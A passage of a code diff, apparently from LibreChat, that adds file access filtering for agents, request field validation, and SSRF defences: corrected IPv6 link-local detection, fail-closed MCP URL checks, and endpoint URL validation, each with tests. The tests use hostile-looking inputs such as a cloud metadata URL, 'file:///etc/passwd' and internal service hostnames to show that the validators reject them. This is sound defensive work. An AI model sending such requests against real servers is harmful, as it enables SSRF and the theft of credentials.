loading) */ + actionsEnabled?: boolean; }; /** @@ -90,6 +93,7 @@ export interface InitializeAgentParams { /** Serializable tool definitions for event-driven mode */ toolDefinitions?: LCTool[]; hasDeferredTools?: boolean; + actionsEnabled?: boolean; } | null>; /** Endpoint option (contains model_parameters and endpoint info) */ endpointOption?: Partial; @@ -108,7 +112,9 @@ export interface InitializeAgentDbMethods extends EndpointDbMethods { /** Update usage tracking for multiple files */ updateFilesUsage: (files: Array<{ file_id: string }>, fileIds?: string[]) => Promise; /** Get files from database */ - getFiles: (filter: unknown, sort: unknown, select: unknown, opts?: unknown) => Promise; + getFiles: (filter: unknown, sort: unknown, select: unknown) => Promise; + /** Filter files by agent access permissions (ownership or agent attachment) */ + filterFilesByAgentAccess?: TFilterFilesByAgentAccess; /** Get tool files by IDs (user-uploaded files only, code files handled separately) */ getToolFilesByIds: (fileIds: string[], toolSet: Set) => Promise; /** Get conversation file IDs */ @@ -268,6 +274,7 @@ export async function initializeAgent( const { attachments: primedAttachments, tool_resources } = await primeResources({ req: req as never, getFiles: db.getFiles as never, + filterFiles: db.filterFilesByAgentAccess, appConfig: req.config, agentId: agent.id, attachments: currentFiles @@ -283,6 +290,7 @@ export async function initializeAgent( userMCPAuthMap, toolDefinitions, hasDeferredTools, + actionsEnabled, tools: structuredTools, } = (await loadTools?.({ req, @@ -300,6 +308,7 @@ export async function initializeAgent( toolRegistry: undefined, toolDefinitions: [], hasDeferredTools: false, + actionsEnabled: undefined, }; const { getOptions, overrideProvider } = getProviderConfig({ @@ -409,6 +418,7 @@ export async function initializeAgent( userMCPAuthMap, toolDefinitions, hasDeferredTools, + actionsEnabled, attachments: finalAttachments, toolContextMap: toolContextMap ?? {}, useLegacyContent: !!options.useLegacyContent, diff --git a/packages/api/src/agents/openai/service.ts b/packages/api/src/agents/openai/service.ts index 807ce8db71..90190ce7ce 100644 --- a/packages/api/src/agents/openai/service.ts +++ b/packages/api/src/agents/openai/service.ts @@ -289,6 +289,14 @@ export function validateRequest(body: unknown): ChatCompletionValidationResult { } } + if (request.conversation_id !== undefined && typeof request.conversation_id !== 'string') { + return { valid: false, error: 'conversation_id must be a string' }; + } + + if (request.parent_message_id !== undefined && typeof request.parent_message_id !== 'string') { + return { valid: false, error: 'parent_message_id must be a string' }; + } + return { valid: true, request: request as unknown as ChatCompletionRequest }; } diff --git a/packages/api/src/agents/resources.test.ts b/packages/api/src/agents/resources.test.ts index bfd2327764..641fb9284c 100644 --- a/packages/api/src/agents/resources.test.ts +++ b/packages/api/src/agents/resources.test.ts @@ -4,7 +4,7 @@ import { EModelEndpoint, EToolResources, AgentCapabilities } from 'librechat-dat import type { TAgentsEndpoint, TFile } from 'librechat-data-provider'; import type { IUser, AppConfig } from '@librechat/data-schemas'; import type { Request as ServerRequest } from 'express'; -import type { TGetFiles } from './resources'; +import type { TGetFiles, TFilterFilesByAgentAccess } from './resources'; // Mock logger jest.mock('@librechat/data-schemas', () => ({ @@ -17,16 +17,16 @@ describe('primeResources', () => { let mockReq: ServerRequest & { user?: IUser }; let mockAppConfig: AppConfig; let mockGetFiles: jest.MockedFunction; + let mockFilterFiles: jest.MockedFunction; let requestFileSet: Set; beforeEach(() => { - // Reset mocks jest.clearAllMocks(); - // Setup mock request - mockReq = {} as unknown as ServerRequest & { user?: IUser }; + mockReq = { + user: { id: 'user1', role: 'USER' }, + } as unknown as ServerRequest & { user?: IUser }; - // Setup mock appConfig mockAppConfig = { endpoints: { [EModelEndpoint.agents]: { @@ -35,10 +35,9 @@ describe('primeResources', () => { }, } as AppConfig; - // Setup mock getFiles function mockGetFiles = jest.fn(); + mockFilterFiles = jest.fn().mockImplementation(({ files }) => Promise.resolve(files)); - // Setup request file set requestFileSet = new Set(['file1', 'file2', 'file3']); }); @@ -70,20 +69,21 @@ describe('primeResources', () => { req: mockReq, appConfig: mockAppConfig, getFiles: mockGetFiles, + filterFiles: mockFilterFiles, requestFileSet, attachments: undefined, tool_resources, + agentId: 'agent_test', }); - expect(mockGetFiles).toHaveBeenCalledWith( - { file_id: { $in: ['ocr-file-1'] } }, - {}, - {}, - { userId: undefined, agentId: undefined }, - ); + expect(mockGetFiles).toHaveBeenCalledWith({ file_id: { $in: ['ocr-file-1'] } }, {}, {}); + expect(mockFilterFiles).toHaveBeenCalledWith({ + files: mockOcrFiles, + userId: 'user1', + role: 'USER', + agentId: 'agent_test', + }); expect(result.attachments).toEqual(mockOcrFiles); - // Context field is deleted after files are fetched and re-categorized - // Since the file is not embedded and has no special properties, it won't be categorized expect(result.tool_resources).toEqual({}); }); }); @@ -1108,12 +1108,10 @@ describe('primeResources', () => { 'ocr-file-1', ); - // Verify getFiles was called with merged file_ids expect(mockGetFiles).toHaveBeenCalledWith( { file_id: { $in: ['context-file-1', 'ocr-file-1'] } }, {}, {}, - { userId: undefined, agentId: undefined }, ); }); @@ -1241,6 +1239,249 @@ describe('primeResources', () => { }); }); + describe('access control filtering', () => { + it('should filter context files through filterFiles when provided', async () => { + const ownedFile: TFile = { + user: 'user1', + file_id: 'owned-file', + filename: 'owned.pdf', + filepath: '/uploads/owned.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + const inaccessibleFile: TFile = { + user: 'other-user', + file_id: 'inaccessible-file', + filename: 'secret.pdf', + filepath: '/uploads/secret.pdf', + object: 'file', + type: 'application/pdf', + bytes: 2048, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([ownedFile, inaccessibleFile]); + mockFilterFiles.mockResolvedValue([ownedFile]); + + const tool_resources = { + [EToolResources.context]: { + file_ids: ['owned-file', 'inaccessible-file'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_shared', + }); + + expect(mockFilterFiles).toHaveBeenCalledWith({ + files: [ownedFile, inaccessibleFile], + userId: 'user1', + role: 'USER', + agentId: 'agent_shared', + }); + expect(result.attachments).toEqual([ownedFile]); + expect(result.attachments).not.toContainEqual(inaccessibleFile); + }); + + it('should filter OCR files merged into context through filterFiles', async () => { + const ocrFile: TFile = { + user: 'other-user', + file_id: 'ocr-restricted', + filename: 'scan.pdf', + filepath: '/uploads/scan.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([ocrFile]); + mockFilterFiles.mockResolvedValue([]); + + const tool_resources = { + [EToolResources.ocr]: { + file_ids: ['ocr-restricted'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_shared', + }); + + expect(mockFilterFiles).toHaveBeenCalledWith({ + files: [ocrFile], + userId: 'user1', + role: 'USER', + agentId: 'agent_shared', + }); + expect(result.attachments).toBeUndefined(); + }); + + it('should skip filtering when filterFiles is not provided', async () => { + const mockFile: TFile = { + user: 'user1', + file_id: 'file-1', + filename: 'doc.pdf', + filepath: '/uploads/doc.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([mockFile]); + + const tool_resources = { + [EToolResources.context]: { + file_ids: ['file-1'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_test', + }); + + expect(mockFilterFiles).not.toHaveBeenCalled(); + expect(result.attachments).toEqual([mockFile]); + }); + + it('should skip filtering when user ID is missing', async () => { + const reqNoUser = {} as unknown as ServerRequest & { user?: IUser }; + const mockFile: TFile = { + user: 'user1', + file_id: 'file-1', + filename: 'doc.pdf', + filepath: '/uploads/doc.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([mockFile]); + + const tool_resources = { + [EToolResources.context]: { + file_ids: ['file-1'], + }, + }; + + const result = await primeResources({ + req: reqNoUser, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_test', + }); + + expect(mockFilterFiles).not.toHaveBeenCalled(); + expect(result.attachments).toEqual([mockFile]); + }); + + it('should gracefully handle filterFiles rejection', async () => { + const mockFile: TFile = { + user: 'user1', + file_id: 'file-1', + filename: 'doc.pdf', + filepath: '/uploads/doc.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([mockFile]); + mockFilterFiles.mockRejectedValue(new Error('DB failure')); + + const tool_resources = { + [EToolResources.context]: { + file_ids: ['file-1'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_test', + }); + + expect(logger.error).toHaveBeenCalledWith('Error priming resources', expect.any(Error)); + expect(result.tool_resources).toEqual(tool_resources); + }); + + it('should skip filtering when agentId is missing', async () => { + const mockFile: TFile = { + user: 'user1', + file_id: 'file-1', + filename: 'doc.pdf', + filepath: '/uploads/doc.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([mockFile]); + + const tool_resources = { + [EToolResources.context]: { + file_ids: ['file-1'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + }); + + expect(mockFilterFiles).not.toHaveBeenCalled(); + expect(result.attachments).toEqual([mockFile]); + }); + }); + describe('edge cases', () => { it('should handle missing appConfig agents endpoint gracefully', async () => { const reqWithoutLocals = {} as ServerRequest & { user?: IUser }; diff --git a/packages/api/src/agents/resources.ts b/packages/api/src/agents/resources.ts index 4655453847..e147c743cf 100644 --- a/packages/api/src/agents/resources.ts +++ b/packages/api/src/agents/resources.ts @@ -10,16 +10,26 @@ import type { Request as ServerRequest } from 'express'; * @param filter - MongoDB filter query for files * @param _sortOptions - Sorting options (currently unused) * @param selectFields - Field selection options - * @param options - Additional options including userId and agentId for access control * @returns Promise resolving to array of files */ export type TGetFiles = ( filter: FilterQuery, _sortOptions: ProjectionType | null | undefined, selectFields: QueryOptions | null | undefined, - options?: { userId?: string; agentId?: string }, ) => Promise>; +/** + * Function type for filtering files by agent access permissions. + * Used to enforce that only files the user has access to (via ownership or agent attachment) + * are returned after a raw DB query. + */ +export type TFilterFilesByAgentAccess = (params: { + files: Array; + userId: string; + role?: string; + agentId: string; +}) => Promise>; + /** * Helper function to add a file to a specific tool resource category * Prevents duplicate files within the same resource category @@ -128,7 +138,7 @@ const categorizeFileForToolResources = ({ /** * Primes resources for agent execution by processing attachments and tool resources * This function: - * 1. Fetches OCR files if OCR is enabled + * 1. Fetches context/OCR files (filtered by agent access control when available) * 2. Processes attachment files * 3. Categorizes files into appropriate tool resources * 4. Prevents duplicate files across all sources @@ -137,15 +147,18 @@ const categorizeFileForToolResources = ({ * @param params.req - Express request object * @param params.appConfig - Application configuration object * @param params.getFiles - Function to retrieve files from database + * @param params.filterFiles - Optional function to enforce agent-based file access control * @param params.requestFileSet - Set of file IDs from the current request * @param params.attachments - Promise resolving to array of attachment files * @param params.tool_resources - Existing tool resources for the agent + * @param params.agentId - Agent ID used for access control filtering * @returns Promise resolving to processed attachments and updated tool resources */ export const primeResources = async ({ req, appConfig, getFiles, + filterFiles, requestFileSet, attachments: _attachments, tool_resources: _tool_resources, @@ -157,6 +170,7 @@ export const primeResources = async ({ attachments: Promise> | undefined; tool_resources: AgentToolResources | undefined; getFiles: TGetFiles; + filterFiles?: TFilterFilesByAgentAccess; agentId?: string; }): Promise<{ attachments: Array | undefined; @@ -228,15 +242,23 @@ export const primeResources = async ({ if (fileIds.length > 0 && isContextEnabled) { delete tool_resources[EToolResources.context]; - const context = await getFiles( + let context = await getFiles( { file_id: { $in: fileIds }, }, {}, {}, - { userId: req.user?.id, agentId }, ); + if (filterFiles && req.user?.id && agentId) { + context = await filterFiles({ + files: context, + userId: req.user.id, + role: req.user.role, + agentId, + }); + } + for (const file of context) { if (!file?.file_id) { continue; diff --git a/packages/api/src/agents/responses/service.ts b/packages/api/src/agents/responses/service.ts index 2e49b1b979..575606123c 100644 --- a/packages/api/src/agents/responses/service.ts +++ b/packages/api/src/agents/responses/service.ts @@ -84,6 +84,13 @@ export function validateResponseRequest(body: unknown): RequestValidationResult } } + if ( + request.previous_response_id !== undefined && + typeof request.previous_response_id !== 'string' + ) { + return { valid: false, error: 'previous_response_id must be a string' }; + } + return { valid: true, request: request as unknown as ResponseRequest }; } diff --git a/packages/api/src/auth/domain.spec.ts b/packages/api/src/auth/domain.spec.ts index 9812960cd9..88a7c98160 100644 --- a/packages/api/src/auth/domain.spec.ts +++ b/packages/api/src/auth/domain.spec.ts @@ -8,10 +8,12 @@ import { extractMCPServerDomain, isActionDomainAllowed, isEmailDomainAllowed, + isOAuthUrlAllowed, isMCPDomainAllowed, isPrivateIP, isSSRFTarget, resolveHostnameSSRF, + validateEndpointURL, } from './domain'; const mockedLookup = lookup as jest.MockedFunction; @@ -177,6 +179,20 @@ describe('isSSRFTarget', () => { expect(isSSRFTarget('fd00::1')).toBe(true); expect(isSSRFTarget('fe80::1')).toBe(true); }); + + it('should block full fe80::/10 link-local range (fe80–febf)', () => { + expect(isSSRFTarget('fe90::1')).toBe(true); + expect(isSSRFTarget('fea0::1')).toBe(true); + expect(isSSRFTarget('feb0::1')).toBe(true); + expect(isSSRFTarget('febf::1')).toBe(true); + expect(isSSRFTarget('fec0::1')).toBe(false); + }); + + it('should NOT false-positive on hostnames whose first label resembles a link-local prefix', () => { + expect(isSSRFTarget('fe90.example.com')).toBe(false); + expect(isSSRFTarget('fea0.api.io')).toBe(false); + expect(isSSRFTarget('febf.service.net')).toBe(false); + }); }); describe('internal hostnames', () => { @@ -277,10 +293,17 @@ describe('isPrivateIP', () => { expect(isPrivateIP('[::1]')).toBe(true); }); - it('should detect unique local (fc/fd) and link-local (fe80)', () => { + it('should detect unique local (fc/fd) and link-local (fe80::/10)', () => { expect(isPrivateIP('fc00::1')).toBe(true); expect(isPrivateIP('fd00::1')).toBe(true); expect(isPrivateIP('fe80::1')).toBe(true); + expect(isPrivateIP('fe90::1')).toBe(true); + expect(isPrivateIP('fea0::1')).toBe(true); + expect(isPrivateIP('feb0::1')).toBe(true); + expect(isPrivateIP('febf::1')).toBe(true); + expect(isPrivateIP('[fe90::1]')).toBe(true); + expect(isPrivateIP('fec0::1')).toBe(false); + expect(isPrivateIP('fe90.example.com')).toBe(false); }); }); @@ -482,6 +505,8 @@ describe('resolveHostnameSSRF', () => { expect(await resolveHostnameSSRF('::1')).toBe(true); expect(await resolveHostnameSSRF('fc00::1')).toBe(true); expect(await resolveHostnameSSRF('fe80::1')).toBe(true); + expect(await resolveHostnameSSRF('fe90::1')).toBe(true); + expect(await resolveHostnameSSRF('febf::1')).toBe(true); expect(mockedLookup).not.toHaveBeenCalled(); }); @@ -1023,8 +1048,37 @@ describe('isMCPDomainAllowed', () => { }); describe('invalid URL handling', () => { - it('should allow config with invalid URL (treated as stdio)', async () => { + it('should reject invalid URL when allowlist is configured', async () => { const config = { url: 'not-a-valid-url' }; + expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(false); + }); + + it('should reject templated URL when allowlist is configured', async () => { + const config = { url: 'http://{{CUSTOM_HOST}}/mcp' }; + expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(false); + }); + + it('should allow invalid URL when no allowlist is configured (defers to connection-level SSRF)', async () => { + const config = { url: 'http://{{CUSTOM_HOST}}/mcp' }; + expect(await isMCPDomainAllowed(config, null)).toBe(true); + expect(await isMCPDomainAllowed(config, undefined)).toBe(true); + expect(await isMCPDomainAllowed(config, [])).toBe(true); + }); + + it('should allow config with whitespace-only URL (treated as absent)', async () => { + const config = { url: ' ' }; + expect(await isMCPDomainAllowed(config, [])).toBe(true); + expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true); + expect(await isMCPDomainAllowed(config, null)).toBe(true); + }); + + it('should allow config with empty string URL (treated as absent)', async () => { + const config = { url: '' }; + expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true); + }); + + it('should allow config with no url property (stdio)', async () => { + const config = { command: 'node', args: ['server.js'] }; expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true); }); }); @@ -1157,3 +1211,225 @@ describe('isMCPDomainAllowed', () => { }); }); }); + +describe('isOAuthUrlAllowed', () => { + it('should return false when allowedDomains is null/undefined/empty', () => { + expect(isOAuthUrlAllowed('https://example.com/token', null)).toBe(false); + expect(isOAuthUrlAllowed('https://example.com/token', undefined)).toBe(false); + expect(isOAuthUrlAllowed('https://example.com/token', [])).toBe(false); + }); + + it('should return false for unparseable URLs', () => { + expect(isOAuthUrlAllowed('not-a-url', ['example.com'])).toBe(false); + }); + + it('should match exact hostnames', () => { + expect(isOAuthUrlAllowed('https://example.com/token', ['example.com'])).toBe(true); + expect(isOAuthUrlAllowed('https://other.com/token', ['example.com'])).toBe(false); + }); + + it('should match wildcard subdomains', () => { + expect(isOAuthUrlAllowed('https://api.example.com/token', ['*.example.com'])).toBe(true); + expect(isOAuthUrlAllowed('https://deep.nested.example.com/token', ['*.example.com'])).toBe( + true, + ); + expect(isOAuthUrlAllowed('https://example.com/token', ['*.example.com'])).toBe(true); + expect(isOAuthUrlAllowed('https://other.com/token', ['*.example.com'])).toBe(false); + }); + + it('should be case-insensitive', () => { + expect(isOAuthUrlAllowed('https://EXAMPLE.COM/token', ['example.com'])).toBe(true); + expect(isOAuthUrlAllowed('https://example.com/token', ['EXAMPLE.COM'])).toBe(true); + }); + + it('should match private/internal URLs when hostname is in allowedDomains', () => { + expect(isOAuthUrlAllowed('http://localhost:8080/token', ['localhost'])).toBe(true); + expect(isOAuthUrlAllowed('http://10.0.0.1/token', ['10.0.0.1'])).toBe(true); + expect( + isOAuthUrlAllowed('http://host.docker.internal:8044/token', ['host.docker.internal']), + ).toBe(true); + expect(isOAuthUrlAllowed('http://myserver.local/token', ['*.local'])).toBe(true); + }); + + it('should match internal URLs with wildcard patterns', () => { + expect(isOAuthUrlAllowed('https://auth.company.internal/token', ['*.company.internal'])).toBe( + true, + ); + expect(isOAuthUrlAllowed('https://company.internal/token', ['*.company.internal'])).toBe(true); + }); + + it('should not match when hostname is absent from allowedDomains', () => { + expect(isOAuthUrlAllowed('http://10.0.0.1/token', ['192.168.1.1'])).toBe(false); + expect(isOAuthUrlAllowed('http://localhost/token', ['host.docker.internal'])).toBe(false); + }); + + describe('protocol and port constraint enforcement', () => { + it('should enforce protocol when allowedDomains specifies one', () => { + expect(isOAuthUrlAllowed('https://auth.internal/token', ['https://auth.internal'])).toBe( + true, + ); + expect(isOAuthUrlAllowed('http://auth.internal/token', ['https://auth.internal'])).toBe( + false, + ); + }); + + it('should allow any protocol when allowedDomains has bare hostname', () => { + expect(isOAuthUrlAllowed('http://auth.internal/token', ['auth.internal'])).toBe(true); + expect(isOAuthUrlAllowed('https://auth.internal/token', ['auth.internal'])).toBe(true); + }); + + it('should enforce port when allowedDomains specifies one', () => { + expect( + isOAuthUrlAllowed('https://auth.internal:8443/token', ['https://auth.internal:8443']), + ).toBe(true); + expect( + isOAuthUrlAllowed('https://auth.internal:6379/token', ['https://auth.internal:8443']), + ).toBe(false); + expect(isOAuthUrlAllowed('https://auth.internal/token', ['https://auth.internal:8443'])).toBe( + false, + ); + }); + + it('should allow any port when allowedDomains has no explicit port', () => { + expect(isOAuthUrlAllowed('https://auth.internal:8443/token', ['auth.internal'])).toBe(true); + expect(isOAuthUrlAllowed('https://auth.internal:22/token', ['auth.internal'])).toBe(true); + }); + + it('should reject wrong port even when hostname matches (prevents port-scanning)', () => { + expect(isOAuthUrlAllowed('http://10.0.0.1:6379/token', ['http://10.0.0.1:8080'])).toBe(false); + expect(isOAuthUrlAllowed('http://10.0.0.1:25/token', ['http://10.0.0.1:8080'])).toBe(false); + }); + }); +}); + +describe('validateEndpointURL', () => { + afterEach(() => { + jest.clearAllMocks(); + }); + + it('should throw for unparseable URLs', async () => { + await expect(validateEndpointURL('not-a-url', 'test-ep')).rejects.toThrow( + 'Invalid base URL for test-ep', + ); + }); + + it('should throw for localhost URLs', async () => { + await expect(validateEndpointURL('http://localhost:8080/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for private IP URLs', async () => { + await expect(validateEndpointURL('http://192.168.1.1/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + await expect(validateEndpointURL('http://10.0.0.1/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + await expect(validateEndpointURL('http://172.16.0.1/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for link-local / metadata IP', async () => { + await expect( + validateEndpointURL('http://169.254.169.254/latest/meta-data/', 'test-ep'), + ).rejects.toThrow('targets a restricted address'); + }); + + it('should throw for loopback IP', async () => { + await expect(validateEndpointURL('http://127.0.0.1:11434/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for internal Docker/Kubernetes hostnames', async () => { + await expect(validateEndpointURL('http://redis:6379/', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + await expect(validateEndpointURL('http://mongodb:27017/', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw when hostname DNS-resolves to a private IP', async () => { + mockedLookup.mockResolvedValueOnce([{ address: '10.0.0.5', family: 4 }] as never); + await expect(validateEndpointURL('https://evil.example.com/v1', 'test-ep')).rejects.toThrow( + 'resolves to a restricted address', + ); + }); + + it('should allow public URLs', async () => { + mockedLookup.mockResolvedValueOnce([{ address: '104.18.7.192', family: 4 }] as never); + await expect( + validateEndpointURL('https://api.openai.com/v1', 'test-ep'), + ).resolves.toBeUndefined(); + }); + + it('should allow public URLs that resolve to public IPs', async () => { + mockedLookup.mockResolvedValueOnce([{ address: '8.8.8.8', family: 4 }] as never); + await expect( + validateEndpointURL('https://api.example.com/v1/chat', 'test-ep'), + ).resolves.toBeUndefined(); + }); + + it('should throw for non-HTTP/HTTPS schemes', async () => { + await expect(validateEndpointURL('ftp://example.com/v1', 'test-ep')).rejects.toThrow( + 'only HTTP and HTTPS are permitted', + ); + await expect(validateEndpointURL('file:///etc/passwd', 'test-ep')).rejects.toThrow( + 'only HTTP and HTTPS are permitted', + ); + await expect(validateEndpointURL('data:text/plain,hello', 'test-ep')).rejects.toThrow( + 'only HTTP and HTTPS are permitted', + ); + }); + + it('should throw for IPv6 loopback URL', async () => { + await expect(validateEndpointURL('http://[::1]:8080/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for IPv6 link-local URL', async () => { + await expect(validateEndpointURL('http://[fe80::1]/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for IPv6 unique-local URL', async () => { + await expect(validateEndpointURL('http://[fc00::1]/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for .local TLD hostname', async () => { + await expect(validateEndpointURL('http://myservice.local/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for .internal TLD hostname', async () => { + await expect(validateEndpointURL('http://api.internal/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should pass when DNS lookup fails (fail-open)', async () => { + mockedLookup.mockRejectedValueOnce(new Error('ENOTFOUND')); + await expect( + validateEndpointURL('https://nonexistent.example.com/v1', 'test-ep'), + ).resolves.toBeUndefined(); + }); + + it('should throw structured JSON with type invalid_base_url', async () => { + const error = await validateEndpointURL('http://169.254.169.254/latest/', 'my-ep').catch( + (err: Error) => err, + ); + expect(error).toBeInstanceOf(Error); + const parsed = JSON.parse((error as Error).message); + expect(parsed.type).toBe('invalid_base_url'); + expect(parsed.message).toContain('my-ep'); + expect(parsed.message).toContain('targets a restricted address'); + }); +}); diff --git a/packages/api/src/auth/domain.ts b/packages/api/src/auth/domain.ts index 2761a80b55..f5719829d5 100644 --- a/packages/api/src/auth/domain.ts +++ b/packages/api/src/auth/domain.ts @@ -59,6 +59,20 @@ function isPrivateIPv4(a: number, b: number, c: number): boolean { return false; } +/** Checks if a pre-normalized (lowercase, bracket-stripped) IPv6 address falls within fe80::/10 */ +function isIPv6LinkLocal(ipv6: string): boolean { + if (!ipv6.includes(':')) { + return false; + } + const firstHextet = ipv6.split(':', 1)[0]; + if (!firstHextet || !/^[0-9a-f]{1,4}$/.test(firstHextet)) { + return false; + } + const hextet = parseInt(firstHextet, 16); + // /10 mask (0xffc0) preserves top 10 bits: fe80 = 1111_1110_10xx_xxxx + return (hextet & 0xffc0) === 0xfe80; +} + /** Checks if an IPv6 address embeds a private IPv4 via 6to4, NAT64, or Teredo */ function hasPrivateEmbeddedIPv4(ipv6: string): boolean { if (!ipv6.startsWith('2002:') && !ipv6.startsWith('64:ff9b::') && !ipv6.startsWith('2001::')) { @@ -132,9 +146,9 @@ export function isPrivateIP(ip: string): boolean { if ( normalized === '::1' || normalized === '::' || - normalized.startsWith('fc') || + normalized.startsWith('fc') || // fc00::/7 — exactly prefixes 'fc' and 'fd' normalized.startsWith('fd') || - normalized.startsWith('fe80') + isIPv6LinkLocal(normalized) // fe80::/10 — spans 0xfe80–0xfebf; bitwise check required ) { return true; } @@ -428,7 +442,10 @@ export async function isActionDomainAllowed( /** * Extracts full domain spec (protocol://hostname:port) from MCP server config URL. * Returns the full origin for proper protocol/port matching against allowedDomains. - * Returns null for stdio transports (no URL) or invalid URLs. + * @returns The full origin string, or null when: + * - No `url` property, non-string, or empty (stdio transport — always allowed upstream) + * - URL string present but cannot be parsed (rejected fail-closed upstream when allowlist active) + * Callers must distinguish these two null cases; see {@link isMCPDomainAllowed}. * @param config - MCP server configuration (accepts any config with optional url field) */ export function extractMCPServerDomain(config: Record): string | null { @@ -452,6 +469,11 @@ export function extractMCPServerDomain(config: Record): string * Validates MCP server domain against allowedDomains. * Supports HTTP, HTTPS, WS, and WSS protocols (per MCP specification). * Stdio transports (no URL) are always allowed. + * Configs with a non-empty URL that cannot be parsed are rejected fail-closed when an + * allowlist is active, preventing template placeholders (e.g. `{{HOST}}`) from bypassing + * domain validation after `processMCPEnv` resolves them at connection time. + * When no allowlist is configured, unparseable URLs fall through to connection-level + * SSRF protection (`createSSRFSafeUndiciConnect`). * @param config - MCP server configuration with optional url field * @param allowedDomains - List of allowed domains (with wildcard support) */ @@ -460,8 +482,18 @@ export async function isMCPDomainAllowed( allowedDomains?: string[] | null, ): Promise { const domain = extractMCPServerDomain(config); + const hasAllowlist = Array.isArray(allowedDomains) && allowedDomains.length > 0; - // Stdio transports don't have domains - always allowed + const hasExplicitUrl = + Object.prototype.hasOwnProperty.call(config, 'url') && + typeof config.url === 'string' && + config.url.trim().length > 0; + + if (!domain && hasExplicitUrl && hasAllowlist) { + return false; + } + + // Stdio transports (no URL) are always allowed if (!domain) { return true; } @@ -469,3 +501,91 @@ export async function isMCPDomainAllowed( // Use MCP_PROTOCOLS (HTTP/HTTPS/WS/WSS) for MCP server validation return isDomainAllowedCore(domain, allowedDomains, MCP_PROTOCOLS); } + +/** + * Checks whether an OAuth URL matches any entry in the MCP allowedDomains list, + * honoring protocol and port constraints when specified by the admin. + * + * Mirrors the allowlist-matching logic of {@link isDomainAllowedCore} (hostname, + * protocol, and explicit-port checks) but is synchronous — no DNS resolution is + * needed because the caller is deciding whether to *skip* the subsequent + * SSRF/DNS checks, not replace them. + * + * @remarks `parseDomainSpec` normalizes `www.` prefixes, so both the input URL + * and allowedDomains entries starting with `www.` are matched without that prefix. + */ +export function isOAuthUrlAllowed(url: string, allowedDomains?: string[] | null): boolean { + if (!Array.isArray(allowedDomains) || allowedDomains.length === 0) { + return false; + } + + const inputSpec = parseDomainSpec(url); + if (!inputSpec) { + return false; + } + + for (const allowedDomain of allowedDomains) { + const allowedSpec = parseDomainSpec(allowedDomain); + if (!allowedSpec) { + continue; + } + if (!hostnameMatches(inputSpec.hostname, allowedSpec)) { + continue; + } + if (allowedSpec.protocol !== null) { + if (inputSpec.protocol === null || inputSpec.protocol !== allowedSpec.protocol) { + continue; + } + } + if (allowedSpec.explicitPort) { + if (!inputSpec.explicitPort || inputSpec.port !== allowedSpec.port) { + continue; + } + } + return true; + } + + return false; +} + +/** Matches ErrorTypes.INVALID_BASE_URL — string literal avoids build-time dependency on data-provider */ +const INVALID_BASE_URL_TYPE = 'invalid_base_url'; + +function throwInvalidBaseURL(message: string): never { + throw new Error(JSON.stringify({ type: INVALID_BASE_URL_TYPE, message })); +} + +/** + * Validates that a user-provided endpoint URL does not target private/internal addresses. + * Throws if the URL is unparseable, uses a non-HTTP(S) scheme, targets a known SSRF hostname, + * or DNS-resolves to a private IP. + * + * @note DNS rebinding: validation performs a single DNS lookup. An adversary controlling + * DNS with TTL=0 could respond with a public IP at validation time and a private IP + * at request time. This is an accepted limitation of point-in-time DNS checks. + * @note Fail-open on DNS errors: a resolution failure here implies a failure at request + * time as well, matching {@link resolveHostnameSSRF} semantics. + */ +export async function validateEndpointURL(url: string, endpoint: string): Promise { + let hostname: string; + let protocol: string; + try { + const parsed = new URL(url); + hostname = parsed.hostname; + protocol = parsed.protocol; + } catch { + throwInvalidBaseURL(`Invalid base URL for ${endpoint}: unable to parse URL.`); 